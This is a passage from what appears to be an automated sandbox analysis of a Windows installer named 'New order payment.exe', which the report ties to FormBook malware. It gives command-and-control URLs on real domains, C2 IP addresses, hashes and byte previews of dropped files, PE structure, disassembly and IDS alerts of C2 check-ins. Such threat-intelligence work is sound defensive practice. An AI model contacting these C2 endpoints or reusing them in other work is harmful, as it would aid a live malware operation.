                                                              • www.baileysepictravel.com/dnz9/?6loH=HDBI6A2bi8qC5gQIk9C/o97/70OIUcVPSl9mt5FnDf+a2+QbRu9zzZgRocBvF69/z8+/&X2M0dv=U47LvnbHD
                                                              CONTRACT 18641.xlsxGet hashmaliciousBrowse
                                                              • www.markarge.com/fqiq/?m6Gd=YR-dILR0AVm&1bft=XEjjI14qJtIhFAlWwrI6OtCMD91wQ8G2c0pwY2Wm0y537Ju/QhVbfxOd4lzzCDtuT3jtCg==
                                                              POSGORSGL2110210416.exeGet hashmaliciousBrowse
                                                              • www.kairoslabs.online/k8u7/?7n=8pZlPfF8exzP&Xt=UN2Ex4ZV8S2AzoiVSxOUVtIK+XqPfQ/0GeJkMW2dP6CUD1qdgaiz/h3No2ujUgdu3B2bDim+Uw==
                                                              Shipping_Doc190dk0lwt837.exeGet hashmaliciousBrowse
                                                              • www.classyeventsco.com/u5eh/?4h=Ve4yD4c+bxfkWvAu5JtOx2/FvaTcxJhGL9dwSQEH3HdPCEPJ4VTJqzzWkduQsZB1LkFI&o0Dd6f=wDKpS
                                                              oacNxjkyOK.exeGet hashmaliciousBrowse
                                                              • www.trulyproofreading.com/ons6/?XfrpLn7h=lDtwWyYf/tjNRrMKaxijla4C6BSVX1zcEr89iyqtK0AraHCaIM2/d/0s7y6LOlomVdUy&t2Mp=cHPxvxKpXXcDTFG
                                                              PRUCHASE ORDER RFQ#8086A_461A_0000086_300_3550_2021.exeGet hashmaliciousBrowse
                                                              • www.matchmakerfiji.com/g8ni/?dN98=ZRG8k8Cp-FExEhZ&g81=wqLORJbd3NDQJpY7Bh+B9Eg20CJ38JcoCHdnxmRPgM4OGEJfZEoqSxxRIm4R6PU1tm8p
                                                              7akn2hhXCM.exeGet hashmaliciousBrowse
                                                              • www.markarge.com/fqiq/?pZYXXHg=XEjjI14vJqIlFQpayrI6OtCMD91wQ8G2c0xgE1KnwS5274C5XxEXJ12f7AfPZjZdc22d&vZ=WVSH
                                                              Nuevo Pago 15.10.2021.exeGet hashmaliciousBrowse
                                                              • www.hilldetailingllc.com/u9xn/?U48=/bfrzf55ANR6uIwFVoEkow0ehd5wxQkDZihcFVS9iR+gkFpFPCLs2yfFdYuQRb7WlbbcZb539A==&_t6LLh=LrcX2bO8WritDXI
                                                              P6R0TOMu8G.exeGet hashmaliciousBrowse
                                                              • www.royalglossesbss.com/kzk9/?TFQL=snKgl6WD8Kfag/4VITdCSZ+dIpE6xAsfIuYLwIgeOQgYPVWc0Iv6Ny7FZANl0/5y3r8A&x8Lx=dN6hub48nxT
                                                              DHL Shipment Notification 74683783.exeGet hashmaliciousBrowse
                                                              • www.tantrapremmoksha.com/i6rd/?Zp80Q2q=UyMOySmTS9NXltILgyAikwebT1bgkkBT8/3XfHHd5QTh/p4C+Kxo/1kpyJY77mKQsLCeeHuWXA==&p4=QBTt
                                                              RNIpSzBRVC.exeGet hashmaliciousBrowse
                                                              • www.thehomedesigncentre.com/ef6c/?l6phLTh=9wsWOtXKc3IvhwcXKHWMBZ2XTuANRe7RvMb04HyqwB7msyhDczGiu6KfXhtJVae7/6etPLfXwg==&UL=5j0Ll4TXePsH7TFp
                                                              Remittance Advice.xlsxGet hashmaliciousBrowse
                                                              • www.matchmakerfiji.com/hr8n/?e2JtT=jVeTzlG8KlLhA&ufbtFP7=uqExRQ5sB23qpaoe9NJ0sqy/Fh86B865GT83lUAMW9QYuoHVLygt4PSEZGaiHS5fg2g4Fw==
                                                              MIN8gr0eOj.exeGet hashmaliciousBrowse
                                                              • www.georgialogisticscontractors.com/pusp/?nnf=uXFBoWTZtuMh2HTsrmmdA8fVM1sPFIdCr4Q56KFd0hKLdN1X2GZAX2QOaOJs2FNGNHZs&l0G=g0DTGJ5xhz3djJ
                                                              p83BktbXwe.exeGet hashmaliciousBrowse
                                                              • www.thehomedesigncentre.com/ef6c/?YFQLD6=9wsWOtXKc3IvhwcXKHWMBZ2XTuANRe7RvMb04HyqwB7msyhDczGiu6KfXhtwKr+4xsCqPLfQjQ==&j0Dxf4=ilHXd
                                                              pdrAizaO1R.exeGet hashmaliciousBrowse
                                                              • www.thehomedesigncentre.com/ef6c/?9rQxK=9wsWOtXKc3IvhwcXKHWMBZ2XTuANRe7RvMb04HyqwB7msyhDczGiu6KfXhtJVae7/6etPLfXwg==&w4z=Wnyl
                                                              7wrbIuHmx6.exeGet hashmaliciousBrowse
                                                              • www.murdabudz.com/mjyv/?ErzH5Le=hg13/nVrKdmTxrsZOoVMHFZDgDUsR9Gv/azPg7g6DqoZmOv7GwW2X7nbApn2zeue/bsr&7nil=Fxlpd
                                                              m2F8C6rz9J.exeGet hashmaliciousBrowse
                                                              • www.thekalimasigroup.com/zizv/?1bT8s=1bbhp0_P&FL0lxhs=6uUlmC4VPdsWT90f9fz6PjebrQ3sc5QRqhCVehk5HlH0wZ2u06vji4tSj593BPqSlafA
                                                              Cl8RbDkHcC.exeGet hashmaliciousBrowse
                                                              • www.murdabudz.com/mjyv/?UfT=JtUdoHt0I&0HzpcX=hg13/nVrKdmTxrsZOoVMHFZDgDUsR9Gv/azPg7g6DqoZmOv7GwW2X7nbAqL1vuimy6R96Z/v3Q==
                                                              Scan0012974- proof of Payment .docGet hashmaliciousBrowse
                                                              • www.sherwoodmastiff.com/hht8/?8pDxgP=UdJvmcuJRPp7sd84RNsoQAu26okuAPtZrff/9Sn2Okly+EZd2NBX7o1J65nwYvo98E3HGw==&ypQH=2djTEXUx-n
                                                              TgbHWecXSn.exeGet hashmaliciousBrowse
                                                              • www.vectobal.com/bckt/?2d_TM=9nu0kQ8BG7S/EHKB1xRIkvMjXK8kVUyVa0yFsrPmJOrAq13FhloDHZa6MocgXNKBXPgXR63qbQ==&YZ4X=u4X4qH_h

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              www.itskosi.compago atrasado.exeGet hashmaliciousBrowse
                                                              • 46.101.121.244
                                                              dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.comDiagram and Specifications.exeGet hashmaliciousBrowse
                                                              • 52.210.179.84
                                                              ZeVbJ7HLUZ.exeGet hashmaliciousBrowse
                                                              • 34.254.166.140
                                                              bank.doc.exeGet hashmaliciousBrowse
                                                              • 34.243.160.251
                                                              E1bCgdZF3a.msiGet hashmaliciousBrowse
                                                              • 52.50.39.94
                                                              FaxMessage5645345.htmlGet hashmaliciousBrowse
                                                              • 52.17.15.53
                                                              enlu5xSNKV.exeGet hashmaliciousBrowse
                                                              • 52.49.20.157
                                                              New _Items.Xlsx.Pdf.exeGet hashmaliciousBrowse
                                                              • 54.246.199.25
                                                              9V3LjvhSMb.exeGet hashmaliciousBrowse
                                                              • 52.49.20.157
                                                              COAU7229898130.xlsxGet hashmaliciousBrowse
                                                              • 34.240.98.209
                                                              PO # 5524792.exeGet hashmaliciousBrowse
                                                              • 34.248.153.214
                                                              order.exe.exeGet hashmaliciousBrowse
                                                              • 52.48.207.46
                                                              www.crisisinterventionadvocates.comNuevo Pago 15.10.2021.exeGet hashmaliciousBrowse
                                                              • 74.208.236.134
                                                              pago atrasado.exeGet hashmaliciousBrowse
                                                              • 74.208.236.134

                                                              ASN

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              PANDGUSJDLA241DJW5.vbsGet hashmaliciousBrowse
                                                              • 137.184.83.38
                                                              KPz4ERtS9aGet hashmaliciousBrowse
                                                              • 143.23.212.59
                                                              F3br85KuNXGet hashmaliciousBrowse
                                                              • 151.211.164.129
                                                              jviIYCvWBcGet hashmaliciousBrowse
                                                              • 143.14.132.166
                                                              b3astmode.x86Get hashmaliciousBrowse
                                                              • 155.127.26.63
                                                              sora.x86Get hashmaliciousBrowse
                                                              • 143.5.192.211
                                                              tqQd9hibj0Get hashmaliciousBrowse
                                                              • 151.214.3.12
                                                              gjoqKYwnGGGet hashmaliciousBrowse
                                                              • 143.10.0.223
                                                              Kot3UfQMDmGet hashmaliciousBrowse
                                                              • 151.208.234.132
                                                              7qvn4qlmi3Get hashmaliciousBrowse
                                                              • 143.39.140.85
                                                              sora.armGet hashmaliciousBrowse
                                                              • 143.38.203.222
                                                              MMpysQ37RUGet hashmaliciousBrowse
                                                              • 151.223.33.119
                                                              arm7Get hashmaliciousBrowse
                                                              • 143.40.8.22
                                                              pandora.armGet hashmaliciousBrowse
                                                              • 143.12.216.157
                                                              arm.lightGet hashmaliciousBrowse
                                                              • 143.40.61.251
                                                              x86Get hashmaliciousBrowse
                                                              • 151.216.2.111
                                                              JIUq8a4ITSGet hashmaliciousBrowse
                                                              • 143.39.72.207
                                                              mYBcqY8XIjGet hashmaliciousBrowse
                                                              • 143.30.225.13
                                                              KEgx4lC3NiGet hashmaliciousBrowse
                                                              • 143.8.201.67
                                                              hoho.arm7Get hashmaliciousBrowse
                                                              • 151.219.242.116
                                                              AMAZON-02USCopy Payment 10272021 pdf.exeGet hashmaliciousBrowse
                                                              • 13.214.5.92
                                                              2jFfKOEefN.exeGet hashmaliciousBrowse
                                                              • 52.58.78.16
                                                              SKGCM_YAHYA AZHEBS#U0130 Ponuda proizvoda7.exeGet hashmaliciousBrowse
                                                              • 44.231.165.140
                                                              usuyeoiSVT.exeGet hashmaliciousBrowse
                                                              • 3.108.154.143
                                                              CONTRACT 18639.xlsxGet hashmaliciousBrowse
                                                              • 44.227.76.166
                                                              jGK42jrs2j.exeGet hashmaliciousBrowse
                                                              • 52.95.169.56
                                                              nCEHDEKsvvGet hashmaliciousBrowse
                                                              • 54.171.230.55
                                                              gqqrsjn4g8Get hashmaliciousBrowse
                                                              • 34.249.145.219
                                                              10CV2biW2dGet hashmaliciousBrowse
                                                              • 34.249.145.219
                                                              mdOr6C8jJpGet hashmaliciousBrowse
                                                              • 54.171.230.55
                                                              DpK5nUwiwE.exeGet hashmaliciousBrowse
                                                              • 52.84.170.66
                                                              DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exeGet hashmaliciousBrowse
                                                              • 52.95.169.64
                                                              p3IJWYfJZw.exeGet hashmaliciousBrowse
                                                              • 52.95.169.12
                                                              Requested Items.xlsxGet hashmaliciousBrowse
                                                              • 44.227.65.245
                                                              6iUUqpBnNi.exeGet hashmaliciousBrowse
                                                              • 54.240.171.70
                                                              x6d8L7ju1g.exeGet hashmaliciousBrowse
                                                              • 54.240.171.70
                                                              SfFC2cykMw.exeGet hashmaliciousBrowse
                                                              • 54.240.171.70
                                                              0L3hPPGkT5.exeGet hashmaliciousBrowse
                                                              • 54.240.171.70
                                                              fdQVuf4rYN.exeGet hashmaliciousBrowse
                                                              • 3.22.15.135
                                                              2LM4yR5arf.exeGet hashmaliciousBrowse
                                                              • 54.240.171.70
                                                              GODADDY-AMSDELsSAq5zX9w.exeGet hashmaliciousBrowse
                                                              • 160.153.136.3
                                                              Hq0UKVWTFV.exeGet hashmaliciousBrowse
                                                              • 160.153.132.203
                                                              Ru185nQI3s.exeGet hashmaliciousBrowse
                                                              • 160.153.132.203
                                                              CONTRACT 18641.xlsxGet hashmaliciousBrowse
                                                              • 160.153.136.3
                                                              POSGORSGL2110210416.exeGet hashmaliciousBrowse
                                                              • 160.153.136.3
                                                              Shipping_Doc190dk0lwt837.exeGet hashmaliciousBrowse
                                                              • 160.153.136.3
                                                              oacNxjkyOK.exeGet hashmaliciousBrowse
                                                              • 160.153.136.3
                                                              statement and Payment.xls.scr.exeGet hashmaliciousBrowse
                                                              • 160.153.133.158
                                                              vm7MKM5wzi.exeGet hashmaliciousBrowse
                                                              • 160.153.133.158
                                                              QVDW8JEUn7.exeGet hashmaliciousBrowse
                                                              • 160.153.133.158
                                                              PRUCHASE ORDER RFQ#8086A_461A_0000086_300_3550_2021.exeGet hashmaliciousBrowse
                                                              • 160.153.136.3
                                                              Shipping Documents.exeGet hashmaliciousBrowse
                                                              • 160.153.137.210
                                                              sh1i15951IGet hashmaliciousBrowse
                                                              • 160.153.160.208
                                                              7akn2hhXCM.exeGet hashmaliciousBrowse
                                                              • 160.153.136.3
                                                              Nuevo Pago 15.10.2021.exeGet hashmaliciousBrowse
                                                              • 160.153.136.3
                                                              DHL-Waybill.exeGet hashmaliciousBrowse
                                                              • 160.153.137.163
                                                              b3astmode.arm7Get hashmaliciousBrowse
                                                              • 188.121.44.165
                                                              DHL-Waybill.exeGet hashmaliciousBrowse
                                                              • 160.153.137.163
                                                              Scan_34668000.exeGet hashmaliciousBrowse
                                                              • 160.153.137.210
                                                              P6R0TOMu8G.exeGet hashmaliciousBrowse
                                                              • 160.153.136.3

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dll
                                                              Process:C:\Users\user\Desktop\New order payment.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22016
                                                              Entropy (8bit):6.518815680444944
                                                              Encrypted:false
                                                              SSDEEP:384:dwLoSt9/A0G24y0CNMPVRFOpFyb8n9g8jjY0C6C2w3efDR4McatJsIf:dwcSt9lG24yUP8+i9BjjbC6Hw34DeKt2
                                                              MD5:6F6E2F6F2744B49B7B411448F0F3EB13
                                                              SHA1:942CAD5FAA2BA6099414609F79B9D54A9B52919C
                                                              SHA-256:74650C5DCC320E98F88369FD97A4A84F7485160441AA1CC985D2912B3E0DFA00
                                                              SHA-512:8948C5C1B1010FA38D7BE0D0C4FF159939AC44D320E2AEA3C9709135FFD79507CD8EFD1633DD04AA8EFB26EFD8FFA1A30A6830F106227D81E8085771D40FFE7B
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..O&...&...&.....}.'......$.......'......"...2..1...&...p.......'.......'.....E.'.......'...Rich&...........PE..L.....ya...........!.....&...,...............@............................................@..........................A..H....C.......p...............................A...............................................@...............................text...f$.......&.................. ..`.rdata..T....@.......*..............@..@.data........P.......8..............@....rsrc........p.......P..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\t45r2i1mcwvd2
                                                              Process:C:\Users\user\Desktop\New order payment.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):216784
                                                              Entropy (8bit):7.989811901336501
                                                              Encrypted:false
                                                              SSDEEP:6144:ZkPO5LByk8SPZBWDBgZcAY8ezH+VSErbZ:Zkm5qSPDWDBgl8zlU
                                                              MD5:B17E78680F254A5E243E10573F4FA8A8
                                                              SHA1:BDA800E70F4AD0326FEE948535556753D5E71791
                                                              SHA-256:CCDC289AC3CD254A46AA2DD634500261CFEC9AFBC4396A24A9564C986752F225
                                                              SHA-512:07166C2B200FAD8C263FC691D62EE7A1A9B1F342AB05776968897DC2304C0482BFA83AB1665023CC69EA3AE877F44AA262B83D294AFAEA6E42C734DACB7C60A2
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: ..>..'T...p.M..r.....P-.7V}....Q.ZN..TCB.U...C...R..3T.P:W..U.+ny...@..RQ..L....C.G..B.....}.o.%..N........G.....h..?.6..5..8.......8c5..9..b{..,:$.;+..i5..^..90.0.%E2.(.)...0.S...$..= .!...Z.Y..q"]..Pm+.....'.N..J..(.h.z....{Y.Z...0.p.........<).j_.'T.%..l..a.-..@.'.P..8....Q<ZN..TCB.U...C...R..3T.P:WX..U.A...7\.J.M?.>...-B...L1ppGg..G.i.......j..H.....=.K....h..?.6...I..NH.R;.?.I.M.}.....@.....*1.0.1.#.b..Cb.kd.2p.).p....... C!...Z......M.........'.N...i.(.h.z....{m.Z...0.p..h......)*j_.'T."+.l..a.-..[....P..8....Q.ZN..TCB.U...C...R..3T.P:WX..U.A...7\.J.M?.>...-B...L1ppGg..G.i.......j..H.....=.K....h..?.6...I..NH.R;.?.I.M.}.....@.....*1.0.1.#.b..Cb.E2.(.)..10....".. .!...Z......M.P.......'.N...i.(.h.z....{m.Z...0.p..h......)*j_.'T."+.l..a.-..[....P..8....Q.ZN..TCB.U...C...R..3T.P:WX..U.A...7\.J.M?.>...-B...L1ppGg..G.i.......j..H.....=.K....h..?.6...I..NH.R;.?.I.M.}.....@.....*1.0.1.#.b..Cb.E2.(.)..10....".. .!...Z......M.P.......'.N...i.(.h.

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Entropy (8bit):7.925228618525558
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:New order payment.exe
                                                              File size:254147
                                                              MD5:0c301355b11c3bc570d18b02bb7c99d8
                                                              SHA1:b35295390555e6fc0b85d538dafbfb4cf8c68564
                                                              SHA256:77abd0b0f20b0ca86c241acf5d5d60188362e75213f894b7bea82c8f75a3c1b1
                                                              SHA512:a84f50ca4ab7f2e7d29388dfc3ddd152437ad049a0b61d30462f0a2fcfbc21e0810bd5851bcae172c613eebf8c4c70c5073c3f641beca700acaa6d35582b3e25
                                                              SSDEEP:6144:wBlL/cqz/4YGOAWponolG63Sqjcj75Z6SMTKuazVY+xDh:CeqD4bOhonylilZnYKuaxY+xDh
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                              File Icon

                                                              Icon Hash:b2a88c96b2ca6a72

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4030fb
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                              Entrypoint Preview

                                                              Instruction
                                                              sub esp, 00000184h
                                                              push ebx
                                                              push ebp
                                                              push esi
                                                              push edi
                                                              xor ebx, ebx
                                                              push 00008001h
                                                              mov dword ptr [esp+20h], ebx
                                                              mov dword ptr [esp+14h], 00409168h
                                                              mov dword ptr [esp+1Ch], ebx
                                                              mov byte ptr [esp+18h], 00000020h
                                                              call dword ptr [004070B0h]
                                                              call dword ptr [004070ACh]
                                                              cmp ax, 00000006h
                                                              je 00007F9238853FA3h
                                                              push ebx
                                                              call 00007F9238856D84h
                                                              cmp eax, ebx
                                                              je 00007F9238853F99h
                                                              push 00000C00h
                                                              call eax
                                                              mov esi, 00407280h
                                                              push esi
                                                              call 00007F9238856D00h
                                                              push esi
                                                              call dword ptr [00407108h]
                                                              lea esi, dword ptr [esi+eax+01h]
                                                              cmp byte ptr [esi], bl
                                                              jne 00007F9238853F7Dh
                                                              push 0000000Dh
                                                              call 00007F9238856D58h
                                                              push 0000000Bh
                                                              call 00007F9238856D51h
                                                              mov dword ptr [00423F44h], eax
                                                              call dword ptr [00407038h]
                                                              push ebx
                                                              call dword ptr [0040726Ch]
                                                              mov dword ptr [00423FF8h], eax
                                                              push ebx
                                                              lea eax, dword ptr [esp+38h]
                                                              push 00000160h
                                                              push eax
                                                              push ebx
                                                              push 0041F4F0h
                                                              call dword ptr [0040715Ch]
                                                              push 0040915Ch
                                                              push 00423740h
                                                              call 00007F9238856984h
                                                              call dword ptr [0040710Ch]
                                                              mov ebp, 0042A000h
                                                              push eax
                                                              push ebp
                                                              call 00007F9238856972h
                                                              push ebx
                                                              call dword ptr [00407144h]

                                                              Rich Headers

                                                              Programming Language:
                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                              .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                              .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .rsrc0x2d0000x9e00xa00False0.45625data4.50948350161IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_ICON0x2d1900x2e8dataEnglishUnited States
                                                              RT_DIALOG0x2d4780x100dataEnglishUnited States
                                                              RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                                              RT_DIALOG0x2d6980x60dataEnglishUnited States
                                                              RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                                              RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                              Imports

                                                              DLLImport
                                                              KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                              USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                              ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              10/27/21-16:20:06.775928TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.551.210.240.92
                                                              10/27/21-16:20:06.775928TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.551.210.240.92
                                                              10/27/21-16:20:06.775928TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.551.210.240.92
                                                              10/27/21-16:20:27.846382TCP1201ATTACK-RESPONSES 403 Forbidden804979034.102.136.180192.168.2.5
                                                              10/27/21-16:20:38.101341TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.574.208.236.134
                                                              10/27/21-16:20:38.101341TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.574.208.236.134
                                                              10/27/21-16:20:38.101341TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.574.208.236.134
                                                              10/27/21-16:20:54.027491TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979880192.168.2.535.241.55.103
                                                              10/27/21-16:20:54.027491TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979880192.168.2.535.241.55.103
                                                              10/27/21-16:20:54.027491TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979880192.168.2.535.241.55.103
                                                              10/27/21-16:21:04.615059TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980080192.168.2.552.210.179.84
                                                              10/27/21-16:21:04.615059TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980080192.168.2.552.210.179.84
                                                              10/27/21-16:21:04.615059TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980080192.168.2.552.210.179.84
                                                              10/27/21-16:21:04.661230TCP1201ATTACK-RESPONSES 403 Forbidden804980052.210.179.84192.168.2.5

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 27, 2021 16:20:06.749406099 CEST4975580192.168.2.551.210.240.92
                                                              Oct 27, 2021 16:20:06.775669098 CEST804975551.210.240.92192.168.2.5
                                                              Oct 27, 2021 16:20:06.775814056 CEST4975580192.168.2.551.210.240.92
                                                              Oct 27, 2021 16:20:06.775928020 CEST4975580192.168.2.551.210.240.92
                                                              Oct 27, 2021 16:20:06.802000046 CEST804975551.210.240.92192.168.2.5
                                                              Oct 27, 2021 16:20:06.802059889 CEST804975551.210.240.92192.168.2.5
                                                              Oct 27, 2021 16:20:06.802073002 CEST804975551.210.240.92192.168.2.5
                                                              Oct 27, 2021 16:20:06.802185059 CEST4975580192.168.2.551.210.240.92
                                                              Oct 27, 2021 16:20:06.802272081 CEST4975580192.168.2.551.210.240.92
                                                              Oct 27, 2021 16:20:06.829627991 CEST804975551.210.240.92192.168.2.5
                                                              Oct 27, 2021 16:20:27.707513094 CEST4979080192.168.2.534.102.136.180
                                                              Oct 27, 2021 16:20:27.726594925 CEST804979034.102.136.180192.168.2.5
                                                              Oct 27, 2021 16:20:27.729527950 CEST4979080192.168.2.534.102.136.180
                                                              Oct 27, 2021 16:20:27.729743958 CEST4979080192.168.2.534.102.136.180
                                                              Oct 27, 2021 16:20:27.748668909 CEST804979034.102.136.180192.168.2.5
                                                              Oct 27, 2021 16:20:27.846381903 CEST804979034.102.136.180192.168.2.5
                                                              Oct 27, 2021 16:20:27.846431017 CEST804979034.102.136.180192.168.2.5
                                                              Oct 27, 2021 16:20:27.846645117 CEST4979080192.168.2.534.102.136.180
                                                              Oct 27, 2021 16:20:27.846729040 CEST4979080192.168.2.534.102.136.180
                                                              Oct 27, 2021 16:20:27.865394115 CEST804979034.102.136.180192.168.2.5
                                                              Oct 27, 2021 16:20:37.961905956 CEST4979180192.168.2.574.208.236.134
